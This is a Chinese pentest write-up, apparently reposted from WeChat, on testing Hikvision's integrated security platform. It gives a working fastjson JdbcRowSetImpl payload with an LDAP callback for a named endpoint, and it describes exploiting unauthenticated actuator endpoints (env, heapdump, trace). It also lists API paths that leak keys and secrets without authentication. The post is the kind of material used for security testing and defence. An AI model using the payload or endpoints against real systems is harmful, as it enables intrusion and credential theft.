在一次测试过程中,发现安防平台的actuator相关问题,于是便记录一下平常会测试的几个点。
0x01:fastjson
这是公开比较长时间的漏洞了,在接口:/bic/ssoService/v1/applyCT中直接构造fastjson poc
诸如:
{"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx:1389/TomcatBypass/TomcatEcho","autoCommit":true}}0x02: actuator未授权
在之前的寻找key和secret的用法中,在官方文档提供的代码能,总是能发现如下内容
即总是会请求一个接口为:/artemis,于是找到安防平台将其拼接在url后
出现了经典的404界面,于是目录扫描了一下
可以看到存在大量的敏感actuator端点,例如常用的env与heapdump
trace端点
利用泄露的token和sign接口构造请求
即可获取安防平台的内容,当然具体其他接口可以参考官方文档
https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2F8058f5f3c4384ae18d3f6c1bdf2d9c05
0x03:key与secret泄露
之前的几次测试中,没有发现mappings端点,在某个系统中发现存在此端点,apikit直接给把接口列出来了
此网站的接口没有进行鉴权,可以直接构造请求,在测试了几个接口后,发现了如下的一些接口可以直接获取key与secret
/artemis/statistic/node/statisticIndex /artemis/consumerinfo/getApiConsumerAppKeyList?appKey=xxx /artemis/consumerinfo/getApiConsumerNameList?cName= /artemis/consumerinfo/showApiConsumer
有了key和secret之后,又回到了之前文章中说的key和secret的利用问题,可参考之前的文章《记一次海康AK凭证泄漏下的利用》,
总结
当然这里的几个actuator问题并不是指的通杀问题,只是部分适用。可以将其添加到nuc或者自用的扫描工具中进行扫描,从而快速发现问题。
因为在实际测试的过程中,可能会出现诸如:存在actuator没mappings,存在mappings无key和secret的获取接口,actuator端点没有想要的内容等等。
本来所涉及到的网站,均在授权下进行测试。本文只是做一个分享,请勿做未授权的测试
原文始发于微信公众号(Str1am Record):海康综合安防平台测试记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论